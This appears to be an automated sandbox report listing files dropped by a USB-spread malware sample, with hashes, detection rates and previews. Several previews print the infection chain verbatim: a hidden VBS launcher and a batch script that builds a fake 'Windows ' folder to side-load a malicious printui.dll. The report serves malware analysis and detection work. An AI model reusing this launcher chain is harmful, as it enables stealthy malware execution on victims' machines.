          Preview:@...e.....................?.s.d.J...7.n..............@..........H...............o..b~.D.poM...P..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....R.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=8, Archive, ctime=Thu Aug 8 07:16:37 2024, mtime=Thu Aug 8 07:16:38 2024, atime=Thu Aug 8 07:16:38 2024, length=119, window=hide
          Category:dropped
          Size (bytes):1300
          Entropy (8bit):2.26064447735445
          Encrypted:false
          SSDEEP:24:8x0gMxnHR/IJl1JbAo0Jl1hJl1683+/QT4I0:8x0JRa3MNr/w83fMI
          MD5:E44C7B2DC7542BA7165E053FD841EA2F
          SHA1:CE93708A718F40EC073A8C34356038B9AE6E2B5E
          SHA-256:B6F6E77A428BFFB23BA965F3B9FA7394F990AD13982A4B92172FBDDC0CDD8987
          SHA-512:E3E6792AED270EB7111D6F093D58E3F5257676725619C3095380BB4A09465F1CCA1803D66D3074EE0A6D6EECF4A69B5B38A1A8CDF97ECCB1BCA3D63F42867634
          Malicious:false
          Preview:L..................F.@.. ....-.Ik.....hJk.....hJk...w............................P.O. .:i.....+00.../F:\...................V.1......Y.B..rootdir.@.......Y.B.Y.B......2....................,..r.o.o.t.d.i.r.....b.2.w....Y.B .x447823.vbs.H.......Y.B.Y.B..............................x.4.4.7.8.2.3...v.b.s.......E...............-.......D....................F:\rootdir\x447823.vbs......\.r.o.o.t.d.i.r.\.x.4.4.7.8.2.3...v.b.s...F.:.\.r.o.o.t.d.i.r...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\System32\shell32.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l...............................................................................................................................................................
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):6
          Entropy (8bit):2.2516291673878226
          Encrypted:false
          SSDEEP:3:nVn:V
          MD5:571FE4CEECA162BBA292C656C321C891
          SHA1:F54C8D1AE78B173651EAA4440730842B71D80126
          SHA-256:148885C0673B85368C318F990D46A67FB9B56AF975022C2C2D48098AC01569B8
          SHA-512:E5551A9288F45E86051850794BB08E80715B09A4C2B467DCA7C15FAEED60E2434F8EF3E89ED126507DC1E67217D893E1DF2886D161A59289CA4617770364581A
          Malicious:false
          Preview:934305
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):95849984
          Entropy (8bit):7.367539726749893
          Encrypted:false
          SSDEEP:1572864:A3zXXlu6Lhy1Oq8MPo+SbzfyS/YTP7ce0Lkvj8SrcaMAVnjRg256RILiFxJaiYUz:A3LXlXhy178MA/aS/YbXAkvj3cCVntgM
          MD5:B82F365E70C125AEFD791621BA8D8C67
          SHA1:49107FD07F9136CC653D81437BA4BB6359C1E1FD
          SHA-256:DE83854E2D6164FE087233F781655545137D9506CAA4CCBF780B11D370898F62
          SHA-512:09F0796265A6C6F56E8CE2E00C07A6EBB807B30318208304763F9C9F0426AE0690C2B7F8166A1803B541C9AD4A580ABCF1333D1E3AFA6F11ADE464663A37361D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 54%
          • Antivirus: Virustotal, Detection: 42%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9).OXG.OXG.OXG.?.B..XG.?.C.CXG.?.D.GXG.OXG.NXG..&B.kXG..&C.@XG..&D.FXG.?.F.LXG.OXF..XG.m'N.LXG.m'..NXG.m'E.NXG.RichOXG.........................PE..d......f.........." ...$............P-....................................................`..................................................C..(...............3.................p"..8...........................0!..@...............x............................text...}........................... ..`.rdata...<.......>..................@..@.data...x ...P.......B..............@....pdata...3.......4...L..............@..@_RDATA..\...........................@..@.fptable...........................@....rsrc..............................@..@.reloc.............................@..B................................................................................................................................................
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):119
          Entropy (8bit):4.879308835659775
          Encrypted:false
          SSDEEP:3:jaPFEm8nh3QgNUqFDYHQcG5cNUqJajaPOUC:j6NqhPUqhYwcGCNUqOUC
          MD5:A0CB7DEDF43CA4A641537E13CBAB3220
          SHA1:E66D010295CD4517B8BBFFCD74F627B472320FBB
          SHA-256:EE4AC015963AA0EE8360B0B4EF1CFCED121DE0A2D58DBD5948E471EB51D3FADE
          SHA-512:4A4804B404A41AC812279C2A1B9528F7EF63D2C08687ECEFA6FD69A2069C9C30DCBB5E82CDB325B0A43F4836FEBACEEC3166893B7CD0C747581731274FFB2CB0
          Malicious:false
          Preview:Set WshShell = CreateObject("WScript.Shell")..WshShell.Run Chr(34) & "x615759.bat" & Chr(34), 0..Set WshShell = Nothing
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
          Category:dropped
          Size (bytes):249
          Entropy (8bit):5.507708744653834
          Encrypted:false
          SSDEEP:6:5jQqSt6NHUvoB19cJVP01u3QqStOVHI/EAq+lN:5jQD6V9cvPlADO9AqaN
          MD5:3B09A6FDC74E236662B9F9CE062E58BF
          SHA1:25C471D361FE3CEC80AD9EFEDF6E3C1448680F4B
          SHA-256:81E13BE69F3FBC0585D9771790474E7E5CF4F2886177E287F6F0CEF732E1981B
          SHA-512:680D86D7EBCC5123FE5D9494F29FDCD70E5CDFC03D500ED1DFBDBE9195E59AD294DFF4E32225C4B8FC3EC26343C9B83F1E1DD1D9E49AF52E48C64D712B6EA1A8
          Malicious:false
          Preview:PK...........Y....]...w.......x447823.vbs.N-Q./...H..Q.Up.JM,I.O.JM..P..N..,(...*i.r.T....)8g.i..h*.)(U.....Z.%%.(..P....^.`T...K22...PK.............Y....]...w.....$....... .......x447823.vbs.. ...........hJk.....hJk....-.Ik...PK..........].........
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:DOS batch file, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):781
          Entropy (8bit):4.992222605475276
          Encrypted:false
          SSDEEP:12:ozZQBCBKYoV5BpQBDx1ijBGvG5QBGfxBA3c09B13Bu09QB1sYocYoU:oCBCBQWBDxaBGu5QBGfxBAM09B1BHQBy
          MD5:20B537FFBE6B2D60948F0276012E9EA4
          SHA1:90B35D822ABEB32E0509F350C3B7494788CC4436
          SHA-256:52C4E9B32A2A8E0FFF86777FC761F3D8DCB34B6642F73091094A3A75624720C5
          SHA-512:3F2471A7F5CE6A997ED3D21A072C72F20C27CB573EF67C1661DF558F6C3713FD0CC1581A5009138A6F48083DB15A0F5A64D9C25EA7C1C9E564D0A60554C44984
          Malicious:false
          Preview:@echo off..chcp 65001..explorer "..\USB Drive"..if not exist "%SystemDrive%\Windows \System32\010101" (...if exist "%SystemDrive%\Windows \System32" rmdir /S /Q "\\?\%SystemDrive%\Windows "...mkdir "\\?\%SystemDrive%\Windows \System32"...mkdir "%SystemDrive%\Windows \System32\010101"...xcopy "%SystemDrive%\Windows\System32\printui.exe" "%SystemDrive%\Windows \System32" /Y...xcopy "x249569.dat" "%SystemDrive%\Windows \System32" /Y...ren "%SystemDrive%\Windows \System32\x249569.dat" "printui.dll"...if exist "%SystemDrive%\Windows \System32\printui.exe" (....if exist "%SystemDrive%\Windows \System32\printui.dll" (.....start "" "%SystemDrive%\Windows \System32\printui.exe"....) else rmdir /S /Q "\\?\%SystemDrive%\Windows "...) else rmdir /S /Q "\\?\%SystemDrive%\Windows "..)
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\xcopy.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):64000
          Entropy (8bit):6.336447440888565
          Encrypted:false
          SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
          MD5:2FC3530F3E05667F8240FC77F7486E7E
          SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
          SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
          SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Joe Sandbox View:
          • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\xcopy.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):95849984
          Entropy (8bit):7.367539726749893
          Encrypted:false
          SSDEEP:1572864:A3zXXlu6Lhy1Oq8MPo+SbzfyS/YTP7ce0Lkvj8SrcaMAVnjRg256RILiFxJaiYUz:A3LXlXhy178MA/aS/YbXAkvj3cCVntgM
          MD5:B82F365E70C125AEFD791621BA8D8C67
          SHA1:49107FD07F9136CC653D81437BA4BB6359C1E1FD
          SHA-256:DE83854E2D6164FE087233F781655545137D9506CAA4CCBF780B11D370898F62
          SHA-512:09F0796265A6C6F56E8CE2E00C07A6EBB807B30318208304763F9C9F0426AE0690C2B7F8166A1803B541C9AD4A580ABCF1333D1E3AFA6F11ADE464663A37361D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 54%
          • Antivirus: Virustotal, Detection: 42%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9).OXG.OXG.OXG.?.B..XG.?.C.CXG.?.D.GXG.OXG.NXG..&B.kXG..&C.@XG..&D.FXG.?.F.LXG.OXF..XG.m'N.LXG.m'..NXG.m'E.NXG.RichOXG.........................PE..d......f.........." ...$............P-....................................................`..................................................C..(...............3.................p"..8...........................0!..@...............x............................text...}........................... ..`.rdata...<.......>..................@..@.data...x ...P.......B..............@....pdata...3.......4...L..............@..@_RDATA..\...........................@..@.fptable...........................@....rsrc..............................@..@.reloc.............................@..B................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):55
          Entropy (8bit):4.306461250274409
          Encrypted:false
          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
          MD5:DCA83F08D448911A14C22EBCACC5AD57
          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
          Malicious:false
          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:modified
          Size (bytes):2464
          Entropy (8bit):3.247255297360145
          Encrypted:false
          SSDEEP:24:QOaqdmuF3rd+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVxwx:FaqdF7d+AAHdKoqKFxcxkFN
          MD5:C4F71E70C8BA9413A17C981A3347B21E
          SHA1:4452902E7372C109AE5D937A3BEA8D0CA0593CBC
          SHA-256:961E3945238C2651363793A4EFB25FD77F06A578837867E6B59052CDBF3EF6E2
          SHA-512:7B9B3E116D55493168FA82673E02F3180BAFBE5BB99AB0C389026127A0EFF93E384343AA71E87879135EC87DC00E6958BBB69959D98E474315F30807D7B9E771
          Malicious:false
          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. A.u.g. .. 3.0. .. 2.0.2.4. .0.1.:.4.0.:.1.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):20756
          Entropy (8bit):5.609056368741965
          Encrypted:false
          SSDEEP:384:5yBrkgG9FZfVQXhr7FvLRn40DQjYjPraz3U6eGbwTgqC:QriFUXhrNLRRcjw4kJGb5qC
          MD5:242EB5FFBEC2B5C2827B2E62ED4A0488
          SHA1:2FED693EDC967488F0A2064E6635B050BA1A372B
          SHA-256:D0D989007D9A4849886CBE447500D1BC0B84865A7C42FF30544593564E9406C6
          SHA-512:C27467A8E81B5ABA88112B7F26189C806F991A1EF7996F44A81A10CFA6C0283ACF512A6BB176886C592430166390E064B8CBED7BD2184DF3697E68FB0FAF1C21
          Malicious:false
          Preview:@...e...................d.............n...G..........@..........H...............o..b~.D.poM...:..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....L.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):482304
          Entropy (8bit):6.5776793475761295
          Encrypted:false
          SSDEEP:6144:1tykCor45CbWLFv49UnD0JsB+eabiNQBph0lhSMXlBXBWnvKV9Rd08LFIPq:eorH8NQJ++eZNAph0lhSMXliv49I8L0
          MD5:7D5124735B17F17AB3DACBA515C397F0
          SHA1:77AAA30168B037BE7013C39A1E744F12A4CF20B6
          SHA-256:DFC94E4B35878172723123269F3DA1BA7854BD4F58F8FBF4C3E4CA20D822BF4A
          SHA-512:84A7DBDFBD8B592A75D7A55A88D7073ABAF1023305853652DA09FB9BE4DC7A8C0C57377CBDB8EE0E0D85DB70EB0296452D02F44C00647B51D15D51C8AC44C91B
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 75%
          • Antivirus: Virustotal, Detection: 72%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-{.[L.G[L.G[L.G+..F.L.G+..FIL.G+..F]L.G...FQL.G...FJL.G...F.L.GH..FYL.G+..F^L.G[L.G.L.GN..FYL.GN..GZL.GN..FZL.GRich[L.G........................PE..d......f.........."....(.............#.........@..........................................`.................................................<...P............P...7......................8..............................@...............p............................text...|........................... ..`.rdata...6.......8..................@..@.data....1..........................@....pdata...7...P...8..................@..@.fptable.............L..............@....rsrc................N..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):4684800
          Entropy (8bit):6.761708409908653
          Encrypted:false
          SSDEEP:98304:E1+WtBcda7nzo7Vd8qQQPQ1CPwDvt3uFGCC:gXtBcda7nzo7Vd8qQQY1CPwDvt3uFGCC
          MD5:158F0E7C4529E3867E07545C6D1174A9
          SHA1:9FF0CCCB271F0215AD24427B7254832549565154
          SHA-256:DCC1FA1A341597DDB1476E3B5B3952456F07870A26FC30B0C6E6312764BAA1FC
          SHA-512:51E79D8D0AB183046F87AA659973B45147BB1E1AE8883F688C615CCB18BF9FCCB8779DD872B01748BACD56E141BC096C2BB4CCF32EBD7A49ADC76363355E40FE
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Joe Sandbox View:
          • Filename: Ld0f3NDosJ.exe, Detection: malicious
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............vI..vI..vI..I..vI;DwH..vI;DsH..vI;DrH..vI;DuH..vI..wI*.vI..wH..vI..vI..vI.GrHl.vI.GvH..vI.G.I..vI.GtH..vIRich..vI........PE..d...d.Lf.........." ...'..4..........4.......................................G...........`...........................................A. ... @D.@....0G.......D.LH...........@G.L.....?.T.............................?.@.............4..............................text...8.4.......4................. ..`.rdata..*.....4.......4.............@..@.data....t...`D..J...JD.............@....pdata..LH....D..J....D.............@..@.rsrc........0G.......F.............@..@.reloc..L....@G.......F.............@..B................................................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):561152
          Entropy (8bit):6.383490918799092
          Encrypted:false
          SSDEEP:12288:0u3rEnX6Gtd3+XZRnRNvNu86p07GZiDnwXA3qGueVW08G:d7EnX/L3+p7NvNu8OqnwXA3qGueVWG
          MD5:93F8F5133ED40262B9FD437915718B82
          SHA1:A18E34F2E1ECADA88249D5B6A87F137A2A1E5041
          SHA-256:78993F8E7AC2D139A8B7198F229D8EF1BA2000D7EB1B07FB7AA4FCCCF7786151
          SHA-512:E1F15B6CEE766D02823938B38BB580C7EFF94E0F4CD907AC4676A65BBC4A9632B5DB0CA54D7B8E6E14042510720E063C00C538DEA3DCBD56C94C65EEADCFCB26
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1i[.u.5Pu.5Pu.5P|p.Pg.5P..4Qw.5P...P}.5P..6Qq.5P..1Q}.5P..0Qx.5Pe.4Qw.5Pu.4P..5P>p4Q~.5Pe.1Q..5Pe.5Qt.5Pe..Pt.5Pu..Pt.5Pe.7Qt.5PRichu.5P........PE..d....,Of.........." ...(.Z...<.......]....................................................`.........................................@.......H...T............`..(S..............X.......T..............................@............p...............................text...8X.......Z.................. ..`.rdata......p.......^..............@..@.data...(0... ...(..................@....pdata..(S...`...T...*..............@..@.rsrc................~..............@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1851113
          Entropy (8bit):6.295735352298234
          Encrypted:false
          SSDEEP:24576:SAlxpPnBAUZLY9OVbbTiZGavkg3NyeuQ6l9fH+f2ykqZrkgecviRd7mQFz:DPnBAUZLY9OEZGaXBuQQ9e2YYUQFz
          MD5:158BC77453D382CF6679CE35DF740CC5
          SHA1:9A3C123CE4B6F6592ED50D6614387D059BFB842F
          SHA-256:CF131738F4B5FE3F42E9108E24595FC3E6573347D78E4E69EC42106C1EEBE42C
          SHA-512:6EB1455537CB4E62E9432032372FAE9CE824A48346E00BAF38EF2F840E0ED3F55ACAEE2656DA656DB00AE0BDEF808F8DA291DD10D7453815152EDA0CCFC73147
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.Jd....q.....& ..."............P..........f............................................. .................................................D....@..........d............P..................................(.......................p............................text..............................`.P`.data...............................@.P..rdata..............................@.`@.pdata..d...........................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..D...........................@.0..CRT....X.... ......................@.@..tls.........0......................@.@..rsrc........@......................@.0..reloc.......P......................@.0B/4...... ....`......................@..B/19.....m....p... ..................@..B/31......2.......4..................@..B/45.....
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):475769
          Entropy (8bit):5.442192544327632
          Encrypted:false
          SSDEEP:12288:YoSRYqB/kDraXbQTNRC6RsclS8DzT6Bam:+YY/kDraLQTNRCPWDzT6Bam
          MD5:E79E7C9D547DDBEE5C8C1796BD092326
          SHA1:8E50B296F4630F6173FC77D07EEA36433E62178A
          SHA-256:1125AC8DC0C4F5C3ED4712E0D8AD29474099FCB55BB0E563A352CE9D03EF1D78
          SHA-512:DBA65731B7ADA0AC90B4122C7B633CD8D9A54B92B2241170C6F09828554A0BC1B0F3EDF6289B6141D3441AB11AF90D6F8210A73F01964276D050E57FB94248E2
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......[.H........& .....D....................(h....................................0......... ......................................................@..8....................P..p........................... 0..(....................................................text...8C.......D..................`.P`.data........`.......J..............@.`..rdata..0M...p...N...L..............@.`@.pdata..............................@.0@.xdata..d...........................@.0@.bss....P.............................`..edata..............................@.0@.idata..............................@.0..CRT....X.... ......................@.@..tls....h....0......................@.`..rsrc...8....@......................@.0..reloc..p....P......................@.0B/4...........`......................@.PB/19..........p......................@..B/31.....1:.......<..................@..B/45.....
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):327168
          Entropy (8bit):6.055910692008984
          Encrypted:false
          SSDEEP:6144:veJ/i9L1mle2NwGTQ46ZEEKN4zP2/SHzI4l/4OMx7apSPIYuh0L/iXmJ:gmV2NwQQ3G4zP22rOIy
          MD5:EF060E5C414B7BE5875437FF2FB8EC54
          SHA1:6DCF04DFF9B25BE556EC97660F95ACF708C0C870
          SHA-256:E6ACED8D30471F35B37ABBF172CE357B6A8F18AF5FEB342B6CFFC01D3378F2B4
          SHA-512:67BFF321BA901A0B0DC0F6C4A723D7DF35418F593E16E6193673CCE5190D76355409F676C1EA5D0CB46493F5735209089A3A52D3D716EB8187BF6E846792E2E8
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........t3R..`R..`R..`[..`D..`To.aP..`To.`T..`To.a_..`To.aZ..`To.aV..`...a^..`n..aU..`R..`K..`=o.ag..`=o.aS..`=o.`S..`R.`S..`=o.aS..`RichR..`........................PE..d.....:f.........." ...&.l...........e.......................................@............`...@...................................................... ..........,"...........0.......k..T...........................pj..@...............p............................text...xj.......l.................. ..`.rdata..vT.......V...p..............@..@.data...............................@....pdata..,".......$..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):818176
          Entropy (8bit):6.269258421632734
          Encrypted:false
          SSDEEP:12288:NGbc08emtUas2F158w1T4qLgl85MNRlqnZ5ydEVB3i:NGoL9W0lJ5cR9dEVB3
          MD5:69D0FEE0CC47C3B255C317F08CE8D274
          SHA1:782BC8F64B47A9DCEDC95895154DCA60346F5DD7
          SHA-256:BA979C2DBFB35D205D9D28D97D177F33D501D954C7187330F6893BB7D0858713
          SHA-512:4955252C7220810ED2EACA002E57D25FBC17862F4878983C4351C917CF7873EB84AE00E5651583004F15A08789BE64BDB34FF20CB0E172C9C1376706DEB4AA1A
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.'.c...O..s...O..|...O..y...O..u..:...u...L..r..q..*...L......L..p...LK.p...L..p..Richq..................PE..d...d.Lf.........." ...'..................................................................`..........................................0...K...{..................Hr..............\.......T...............................@............................................text...X........................... ..`.rdata..L...........................@..@.data...8=.......8..................@....pdata..Hr.......t..................@..@.rsrc................`..............@..@.reloc..\............d..............@..B........................................................................................................................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
          Category:dropped
          Size (bytes):52736
          Entropy (8bit):5.840253326728635
          Encrypted:false
          SSDEEP:768:fE20UsQSmxsJ/jPxsiFFnoCImovqcyz88rtYNChvThLaim3Yu/g/D8:cis0sP5FBQ7vU9BYshtaim3Yuo78
          MD5:9DC829C2C8962347BC9ADF891C51AC05
          SHA1:BF9251A7165BB2981E613AC5D9051F19EDB68463
          SHA-256:FFE2D56375BB4E8BDEE9037DF6BEFC5016DDD8871D0D85027314DD5792F8FDC9
          SHA-512:FD7E6F50A21CB59075DFA08C5E6275FD20723B01A23C3E24FB369F2D95A379B5AC6AE9F509AA42861D9C5114BE47CCE9FF886F0A03758BFDC3A2A9C4D75FAB56
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....|.....................d.............................P................ ......................................................0..P....................@..h........................... ..(....................................................text...({.......|..................`.P`.data...............................@.P..rdata..............................@.P@.pdata..............................@.0@.xdata..............................@.0@.bss..................................p..edata..............................@.0@.idata..............................@.0..CRT....`...........................@.@..tls....h.... ......................@.`..rsrc...P....0......................@.0..reloc..h....@......................@.0B................................................................................................................................
          Process:C:\Windows \System32\printui.exe
          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
          Category:dropped
          Size (bytes):1786880
          Entropy (8bit):6.056894707447503
          Encrypted:false
          SSDEEP:24576:JUV0C8E3W4JoceLErS6P0qoc6uoPrT5PgVBHmaw+zrGOzli7Gi0m9ZRXyYk:i8/B90ozghlGJ7js
          MD5:C3130CFB00549A5A92DA60E7F79F5FC9
          SHA1:56C2E8FB1AF609525B0F732BB67B806BDDAB3752
          SHA-256:EEE42EABC546E5AA760F8DF7105FCF505ABFFCB9EC4BF54398436303E407A3F8
          SHA-512:29BAB5B441484BDFAC9EC21CD4F0F7454AF05BFD7D77F7D4662AEAEAA0D3E25439D52AA341958E7896701546B4A607D3C7A32715386C78B746DFAE8529A70748
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%
